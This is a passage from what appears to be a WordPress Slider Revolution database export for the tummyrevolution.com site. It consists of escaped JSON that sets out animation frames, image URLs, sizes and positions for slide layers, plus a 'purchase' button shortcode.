To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1000,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8000,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"image\"},\"10\":{\"text\":\"Image 10\",\"alias\":\"Image 10\",\"uid\":10,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-slide2-graphic71.png\",\"imageId\":4609},\"size\":{\"width\":{\"d\":{\"v\":\"169px\",\"e\":true},\"n\":{\"v\":\"132px\",\"e\":true},\"t\":{\"v\":\"132px\",\"e\":true},\"m\":{\"v\":\"68px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"146px\",\"e\":true},\"n\":{\"v\":\"114px\",\"e\":true},\"t\":{\"v\":\"114px\",\"e\":true},\"m\":{\"v\":\"59px\",\"e\":true}},\"originalWidth\":169,\"originalHeight\":146,\"aspectRatio\":{\"d\":{\"v\":1.15753424657534242925294165615923702716827392578125},\"n\":{\"v\":1.15753424657534242925294165615923702716827392578125},\"t\":{\"v\":1.15753424657534242925294165615923702716827392578125},\"m\":{\"v\":1.15753424657534242925294165615923702716827392578125}}},\"position\":{\"x\":{\"d\":{\"v\":\"280px\",\"e\":true},\"n\":{\"v\":\"280px\",\"e\":true},\"t\":{\"v\":\"16px\",\"e\":true},\"m\":{\"v\":\"61px\",\"e\":true}},\"y\":{\"d\":{\"e\":true},\"n\":{\"v\":\"293px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":13,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":13,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"100%\"},\"n\":{\"v\":\"100%\"},\"t\":{\"v\":\"100%\"},\"m\":{\"v\":\"100%\"}},\"z\":\"0\",\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":\"0deg\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true,\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"100%\"},\"n\":{\"v\":\"100%\"},\"t\":{\"v\":\"100%\"},\"m\":{\"v\":\"100%\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power2.easeInOut\",\"speed\":900,\"start\":0}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true},\"timeline\":{\"ease\":\"Power2.easeInOut\",\"speed\":900,\"start\":0}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8100,\"endWithSlide\":true}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"image\"},\"11\":{\"text\":\"Image 11\",\"alias\":\"Image 11\",\"uid\":11,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/landing-slide2-graphic8.png\",\"imageId\":3454},\"size\":{\"width\":{\"d\":{\"v\":\"329px\",\"e\":true},\"n\":{\"v\":\"271px\",\"e\":true},\"t\":{\"v\":\"289px\",\"e\":true},\"m\":{\"v\":\"118px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"187px\",\"e\":true},\"n\":{\"v\":\"154px\",\"e\":true},\"t\":{\"v\":\"164px\",\"e\":true},\"m\":{\"v\":\"67px\",\"e\":true}},\"originalWidth\":329,\"originalHeight\":187,\"aspectRatio\":{\"d\":{\"v\":1.759358288770053402316762003465555608272552490234375},\"n\":{\"v\":1.759358288770053402316762003465555608272552490234375},\"t\":{\"v\":1.759358288770053402316762003465555608272552490234375},\"m\":{\"v\":1.759358288770053402316762003465555608272552490234375}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"v\":\"588px\",\"e\":true},\"t\":{\"v\":\"-30px\",\"e\":true},\"m\":{\"v\":\"-25px\",\"e\":true}},\"y\":{\"d\":{\"e\":true},\"n\":{\"v\":\"270px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"1px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":14,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":14,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"100%\"},\"n\":{\"v\":\"100%\"},\"t\":{\"v\":\"100%\"},\"m\":{\"v\":\"100%\"}},\"z\":\"0\",\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":\"0deg\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true,\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"100%\"},\"n\":{\"v\":\"100%\"},\"t\":{\"v\":\"100%\"},\"m\":{\"v\":\"100%\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power2.easeInOut\",\"speed\":900,\"start\":0}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true},\"timeline\":{\"ease\":\"Power2.easeInOut\",\"speed\":900,\"start\":0}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8100,\"endWithSlide\":true}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"image\"},\"13\":{\"text\":\"[qodef_button size=\\\"medium\\\" text=\\\"purchase\\\" target=\\\"_self\\\" icon_pack=\\\"\\\" font_weight=\\\"\\\" text_transform=\\\"\\\"]\",\"alias\":\"[qodef_button size=\",\"uid\":13,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"-15px\",\"e\":true},\"n\":{\"v\":\"-3px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"127px\",\"e\":true},\"n\":{\"v\":\"90px\",\"e\":true},\"t\":{\"v\":\"85px\",\"e\":true},\"m\":{\"v\":\"87px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":15,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":15,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"}}','{\"0\":\"\",\"version\":\"6.1.6\"}'),(26,12,1,'{\"title\":\"Slide\",\"bg\":{\"type\":\"solid\",\"color\":\"#f7f7f7\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"timeline\":{\"slots\":[\"default\"],\"duration\":[600]}}','{\"1\":{\"text\":\"Image 1\",\"alias\":\"Image 1\",\"uid\":1,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-cimet-img-71.png\",\"imageId\":4589},\"size\":{\"width\":{\"d\":{\"v\":\"186px\",\"e\":true},\"n\":{\"v\":\"158px\",\"e\":true},\"t\":{\"v\":\"164px\",\"e\":true},\"m\":{\"v\":\"94px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"394px\",\"e\":true},\"n\":{\"v\":\"333px\",\"e\":true},\"t\":{\"v\":\"347px\",\"e\":true},\"m\":{\"v\":\"198px\",\"e\":true}},\"originalWidth\":186,\"originalHeight\":394,\"aspectRatio\":{\"d\":{\"v\":0.472081218274111702459805428588879294693470001220703125},\"n\":{\"v\":0.472081218274111702459805428588879294693470001220703125},\"t\":{\"v\":0.472081218274111702459805428588879294693470001220703125},\"m\":{\"v\":0.472081218274111702459805428588879294693470001220703125}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"v\":\"-614px\",\"e\":true},\"t\":{\"v\":\"-16px\",\"e\":true},\"m\":{\"v\":\"-25px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"260px\",\"e\":true},\"n\":{\"v\":\"103px\",\"e\":true},\"t\":{\"v\":\"255px\",\"e\":true},\"m\":{\"v\":\"235px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":5,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-100%\"},\"n\":{\"v\":\"-100%\"},\"t\":{\"v\":\"-100%\"},\"m\":{\"v\":\"-100%\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"0\",\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":\"0deg\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true,\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim 